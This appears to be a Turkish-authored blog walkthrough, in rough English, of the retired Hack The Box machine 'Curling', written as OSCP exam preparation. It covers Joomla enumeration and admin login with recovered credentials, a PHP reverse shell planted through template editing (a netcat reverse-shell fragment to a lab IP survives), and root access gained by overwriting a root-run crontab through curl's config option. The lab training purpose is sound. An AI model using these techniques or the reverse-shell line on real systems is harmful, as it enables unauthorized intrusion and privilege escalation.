OSCP PREPROTİONS – HTB Curling

Curling machine is a vulnerable machine with a retired Linux operating system. User and root flag values are requested using the vulnerabilities detected as a result of enumuration.
First, we perform classic scan, TCP and UDP full port scan to recognize the machine.

According to the scan result, we see that ports 80 and 22 are open.
First, since port 80 is open, we go through broser.
We detect that joomla CMS (Content Management System) is used to access the website

We are looking at the source code and in the last part we see something related to secret.txt in the body section

We go to the directory to see if the secret.txt file exists.
Q3VybGluZzIwMTgh
Something came out and we didn’t understand what it was.

then let’s throw it on cyberchef and define the magic value.

It seems to be Base64, let’s decode it. When we decode it, we see that it is Curling2018!

It has something similar to a password, we note it with us and continue the enumuration.
We are doing a directory scan with Gobuster.

We see detailed directories and take note of these directories.

Since your website has joomla CMS, we scan it with the joomscan tool.

Here we have identified useful directories.
We continue with the enumuration process in the website interface. We go into the writings in the style of bog writing, the user named “Floris” catches our eye, we think that this may be the username here and we take a note and continue.

We go to the administraot directory that we detected in the directory explorer.

We try to log in with the username and password we obtained and succeed (Floris:Curling2018!)

We are able to control it on the website. From here we can add a Shell and run our commands. Now we are investigating where the Shell joint parts can be.
When we go to Extensions>templates>templates, we see that we can add a php file. Here we can create a revershell while adding the php file.

We say Cretae and provide page articulation. We get the payload of how to create php revershell at https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.
&1|nc 10.10.14.7 1234 >/tmp/f’);
?>

We write the command and save it. And we play it back with nc.

We go to the written Shell file.

We got our revershell. In this revershell, we could not even get the user flags on the www-data user with very limited privileges.

We received a permissin denied error continuously.
But we were able to read the password_backup, thinking that there was passowrd here, we tried to decode this file with cyberchef, which was obviously hexdump, and we made a detec file every time we decoded it and used decompiler accordingly.

We were able to obtain the password 5d<wdCbdZu)|hChXll with Cyberchef and we immediately try it with ssh.
We were able to log in successfully

Let’s go read our user flag

We are trying to elevate root authorization on the Floris user, here we are performing enumuration.

We cannot access the root directory.
While doing enumuration, the admin-area directory is remarkable, when we enter there, we see files named input and report. It is noteworthy that they are under root authorization and can be read and edited by floris.

We continue with enumuration. We want to look at the processes running in the back with Pspy (it allows us to see processes such as process crontab running in the back without the need for root authorization).
We forwarded the file from our attack machine to the target machine.

Then we ran the file on the target machine.

As far as we understand from this crontab, it runs the input tu and presents the input output as a report (-k parameter as input -o parameter as output)
With the ls -la command, the input file belongs to our group, so we can write our own configuration. In the report file, we know that the “output” parameter can be used to specify the output file. We can create a malicious crontab and overwrite it.
To do this, I learn how to use the -k parameter in curl with the “man curl” command.

As we see here, we can see that we can write to the file by getting output in the curl command.
Here we think that we can create a scheduled task that can provide revershell and run it on the target machine and get root privileges.
First, let’s create a file that can provide revershell, let it be a crontab file.
We prepare it on our own machine.

Now we have prepared our crontab file to give revershell
Let’s edit the input file on the target machine with the nano editor

Now that we have edited our input file, it is time to run our own machine as a web server and listen to revershelli in the background with netcat.

He took our file here
Our Reverseshell gave 😊

Comments

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir